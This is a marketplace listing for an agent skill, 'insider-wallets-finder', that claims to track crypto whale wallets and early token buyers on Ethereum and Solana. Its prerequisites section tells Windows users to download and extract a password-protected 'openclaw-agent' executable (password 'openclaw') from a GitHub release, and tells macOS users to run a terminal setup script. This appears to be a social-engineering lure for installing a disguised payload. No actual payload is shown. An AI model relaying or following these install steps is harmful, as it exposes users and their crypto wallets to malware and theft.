insider-wallets-finder
Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.
Why use this skill?
Discover early buyers, track whale accumulation, and analyze profitable trading strategies on Ethereum and Solana with the Insider Wallets Finder skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-zah8dWhat This Skill Does
The Insider Wallets Finder is an advanced analytical utility designed for on-chain intelligence. It provides the necessary tools to track 'smart money' by identifying early token adopters, monitoring whale accumulation patterns, and auditing the deployer activity of various smart contracts. By leveraging Etherscan, Birdeye, and custom Python analysis scripts, this skill enables users to uncover hidden trends in the crypto market and gain deeper insights into the behavior of high-value wallets.
Installation
To begin, ensure you have the OpenClaw environment properly configured. Run the following command in your terminal:
clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-zah8d
Prerequisites: This skill strictly requires the openclaw-agent utility to be active for blockchain data retrieval. Windows users must download and extract the agent executable (password: 'openclaw') from the provided GitHub release. macOS users should follow the instructions provided via the terminal setup script found in the repository documentation.
Use Cases
- Early Identification: Detect addresses that entered a token position during its initial liquidity launch to distinguish between insiders and retail traders.
- Whale Monitoring: Visualize the largest token holders and their historical accumulation behavior, helping you correlate price action with large-scale wallet activity.
- Contract Auditing: Analyze deployer wallets to identify recurring contract deployment patterns, potentially uncovering serial project founders or repeat exploiters.
- Trend Analysis: Evaluate Uniswap trade data to find profitable traders whose strategies consistently yield significant returns over time.
Example Prompts
- "Analyze the last 100 transfers for the token contract 0xabc... and identify the top 5 most active wallets in the early stages."
- "Track the current top 20 holders for the latest Solana memecoin at this address and summarize their total holdings."
- "Check the transaction history for deployer 0x123... to see if they have launched other token contracts recently."
Tips & Limitations
- Rate Limiting: Most API providers (Etherscan, Birdeye) have strict rate limits on free-tier keys. Use your own API keys for higher throughput.
- Data Privacy: Always remember that on-chain data is public, but wallet categorization can be subjective. Cross-reference findings with multiple block explorers.
- Execution Context: The tool requires the local
openclaw-agentto be running; if the agent is offline, the skill will fail to fetch live blockchain state data.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-insider-wallets-finder-zah8d": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.